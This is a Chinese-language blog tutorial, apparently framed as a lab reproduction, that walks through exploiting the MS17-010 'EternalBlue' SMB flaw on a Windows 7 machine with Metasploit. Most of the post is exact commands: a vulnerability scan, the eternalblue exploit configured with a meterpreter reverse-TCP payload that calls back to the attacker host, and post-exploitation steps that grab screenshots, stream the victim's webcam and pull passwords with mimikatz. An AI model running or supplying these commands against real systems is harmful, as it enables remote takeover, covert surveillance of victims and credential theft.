今天就跟大家分享下刚刚学习到利用MSF框架快速搞定“MS017-010”漏洞。其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。

445端口简介:

445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉! 2017年10月,由于病毒"坏兔子"来袭,国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

准备:

  1. Kali系统  版本:2.0   IP:192.168.0.129
  2. Win7系统           IP:192.168.0.130   开放端口:445
  3. MSF框架版本:4.14.17版本以上
  4. 安装更新metasploit

实战攻击:

Step1:查看MSF框架版本

在终端输入msfconsole

Step2: 安装更新metasploit

终端输入apt-get  install metasploit-framework

Step3:漏洞模块路经查询

在终端输入:search ms17-010

Step4:加载扫描模块

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.0.130       (靶机的IP)

exploit

Step5:加载攻击模块并配置参数

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set rhost 192.168.0.130 (靶机的IP)

set lhost 192.168.0.129 (发起攻击的主机IP)

set lport 443       (监听的端口)

Step6:发起攻击,成功会反弹shell

输入run或者exploit

Meterpreter功能展现

1.捕捉桌面:

meterpreter >screenshot

2.视屏开启

meterpreter > webcam_stream

kali会自动打开浏览器播放被攻击电脑的摄像头,被攻击者的摄像头也会亮起来

3.获取系统管理密码

Step1:载入mimikatz

meterpreter > load mimikatz

Step2:使用命令wdigest获取密码

Meterpreter功能有很多,这里就不一一的示范了,有兴趣的可以自己去测试下。

永恒之蓝漏洞(EternalBlue)相关推荐

  1. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  2. EternalBlue永恒之蓝漏洞(MS17-010)复现

    测试环境 靶机:    Windows7                IP:192.168.5.90   开放445端口  关闭防火墙 攻击机:Windows10/kali        IP:19 ...

  3. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  4. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  5. 永恒之蓝漏洞ms17-010

    本示例主要提供学习使用,不得用于违法犯罪 目录 什么是永恒之蓝 漏洞复现: 1.信息收集 2.进入MSF利用永恒之蓝漏洞模块 3.后渗透阶段 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团 ...

  6. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  7. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  8. 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...

  9. 永恒之蓝漏洞分析与防护技术

    前言 自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,结果菜鸡的我一顿操作都没找回来,就不想写博客了(后来大佬说使用windbg附加,找到那块内存,dump出来就可以还原了,自己还是太年轻呀) ...

  10. 【漏洞复现】永恒之蓝漏洞(MS17-010)

    一.MS17-010 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开 ...

最新文章

  1. solr安装-tomcat+solrCloud构建稳健solr集群
  2. ios10中禁止用户缩放页面
  3. 手机端viewport的设置规范
  4. @ComponentScan.Filter type的类型
  5. ios文件系统架构图,图片解说
  6. python函数被调用才能执行吗_python3x函数在不被调用的情况下运行
  7. centos mysql自动补全_MyCLI :一个支持自动补全和语法高亮的 MySQL/MariaDB 客户端
  8. 输出整数各位数字 (15 分)
  9. 【BZOJ1206】【HNOI2005】虚拟内存,我也就能写写这种模拟题了
  10. C++ 不定参数(转)
  11. Archlinux安裝指南(uefi+gpt)
  12. 【linux】具体芯片MACHINE_START处理
  13. wifi 性能 测试 android,WiFi性能测试
  14. 台式计算机进入安全模式蓝屏,电脑进安全模式蓝屏怎么办
  15. 最小二乘法曲线拟合+C代码
  16. sql server 备份mysql_SQL Server远程数据库操作(备份、还原等)
  17. win10 磁盘管理 压缩卷 无法启动问题
  18. Android设置视频背景
  19. 干货 | 携程机票Sketch插件开发实践
  20. 根据公式计算圆周率PI

热门文章

  1. C语言:7-13 藏尾诗 (20分)
  2. HTML学习笔记-v1.3
  3. python networkx.algorithms.approximation.steinertree 介绍
  4. mysql数据库删除千万条数据的操作方案
  5. 相机精度与像素的关系
  6. 程序员该不该去外包公司?
  7. PreSubclassWindow详细分析
  8. 食物和计算机中一样的英语,表示食物或饮料的英语单词有哪些?
  9. 做什么生意是最稳定的呢?
  10. TeamViewer远程访问和控制功能现已支持所有安卓设备